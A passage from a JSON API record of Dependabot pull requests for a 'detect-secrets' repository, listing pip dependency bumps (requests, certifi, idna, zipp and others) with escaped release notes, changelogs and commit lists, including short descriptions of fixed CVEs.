changes.\u003c/p\u003e\n\u003ch1\u003ev3.18.1\u003c/h1\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch1\u003ev3.18.0\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBypass ZipFile.namelist in glob for better performance. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/106\"\u003e#106\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRefactored glob functionality to support a more generalized solution with support for platform-specific path separators. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/108\"\u003e#108\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd special accounting for pypy when computing the stack level for text encoding warnings. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/114\"\u003e#114\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.17.0\u003c/h1\u003e\n\u003cp\u003eFeatures\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/6d1cb72aa55e0536f35d2af128994b5a61ca4c1a\"\u003e\u003ccode\u003e6d1cb72\u003c/code\u003e\u003c/a\u003e Finalize\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/fd604bd34f0343472521a36da1fbd22e793e14fd\"\u003e\u003ccode\u003efd604bd\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/120\"\u003e#120\u003c/a\u003e from jaraco/bugfix/119-malformed-paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/c18417ed2953e181728a7dac07bff88a2190abf7\"\u003e\u003ccode\u003ec18417e\u003c/code\u003e\u003c/a\u003e Add news fragment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/58115d2be968644ce71ce6bcc9b79826c82a1806\"\u003e\u003ccode\u003e58115d2\u003c/code\u003e\u003c/a\u003e Employ SanitizedNames in CompleteDirs. Fixes broken test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/564fcc10cdbfdaecdb33688e149827465931c9e0\"\u003e\u003ccode\u003e564fcc1\u003c/code\u003e\u003c/a\u003e Add SanitizedNames mixin.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/79a309fe54dc6b7934fb72e9f31bcb58f2e9f547\"\u003e\u003ccode\u003e79a309f\u003c/code\u003e\u003c/a\u003e Add some assertions about malformed paths.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/2d015c22348fab46ca765339f55f84fe9d6e8115\"\u003e\u003ccode\u003e2d015c2\u003c/code\u003e\u003c/a\u003e Merge \u003ca href=\"https://github.com/jaraco/skeleton\"\u003ehttps://github.com/jaraco/skeleton\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/a595a0fad054cd20b69d3e954c99174e3a548938\"\u003e\u003ccode\u003ea595a0f\u003c/code\u003e\u003c/a\u003e Rename extras to align with core metadata spec.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/608f90a6e74919501577a1312dc5c7d8e1d391d7\"\u003e\u003ccode\u003e608f90a\u003c/code\u003e\u003c/a\u003e Finalize\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/3a22d724acf874111b43f87f7110225122ec3de5\"\u003e\u003ccode\u003e3a22d72\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/118\"\u003e#118\u003c/a\u003e from jaraco/feature/is-symlink\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jaraco/zipp/compare/v3.4.0...v3.19.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/hashier/detect-secrets/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/hashier/detect-secrets/pull/3","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/hashier%2Fdetect-secrets/issues/3","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/3/packages"},{"uuid":"2579756678","node_id":"PR_kwDOExOKTM6Zw_aG","number":6,"state":"open","title":"Bump the pip group across 1 directory with 12 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-10T00:21:07.000Z","updated_at":"2025-06-10T00:21:08.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":12,"packages":[{"name":"requests","old_version":"2.23.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"certifi","old_version":"2020.4.5.1","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"idna","old_version":"2.9","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"lxml","old_version":"4.5.0","new_version":"4.9.1","repository_url":"https://github.com/lxml/lxml"},{"name":"tqdm","old_version":"4.46.0","new_version":"4.66.3","repository_url":"https://github.com/tqdm/tqdm"},{"name":"urllib3","old_version":"1.25.9","new_version":"1.26.19","repository_url":"https://github.com/urllib3/urllib3"},{"name":"websockets","old_version":"8.1","new_version":"9.1","repository_url":"https://github.com/python-websockets/websockets"},{"name":"babel","old_version":"2.8.0","new_version":"2.9.1","repository_url":"https://github.com/python-babel/babel"},{"name":"bleach","old_version":"3.1.5","new_version":"3.3.0","repository_url":"https://github.com/mozilla/bleach"},{"name":"jinja2","old_version":"2.11.2","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"py","old_version":"1.8.1","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"zipp","old_version":"3.1.0","new_version":"3.19.1","repository_url":"https://github.com/jaraco/zipp"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 12 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [requests](https://github.com/psf/requests) | `2.23.0` | `2.32.4` |\n| [certifi](https://github.com/certifi/python-certifi) | `2020.4.5.1` | `2024.7.4` |\n| [idna](https://github.com/kjd/idna) | `2.9` | `3.7` |\n| [lxml](https://github.com/lxml/lxml) | `4.5.0` | `4.9.1` |\n| [tqdm](https://github.com/tqdm/tqdm) | `4.46.0` | `4.66.3` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.25.9` | `1.26.19` |\n| [websockets](https://github.com/python-websockets/websockets) | `8.1` | `9.1` |\n| [babel](https://github.com/python-babel/babel) | `2.8.0` | `2.9.1` |\n| [bleach](https://github.com/mozilla/bleach) | `3.1.5` | `3.3.0` |\n| [jinja2](https://github.com/pallets/jinja) | `2.11.2` | `3.1.6` |\n| [py](https://github.com/pytest-dev/py) | `1.8.1` | `1.11.0` |\n| [zipp](https://github.com/jaraco/zipp) | `3.1.0` | `3.19.1` |\n\n\nUpdates `requests` from 2.23.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.23.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2020.4.5.1 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2020.04.05.1...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.9 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca 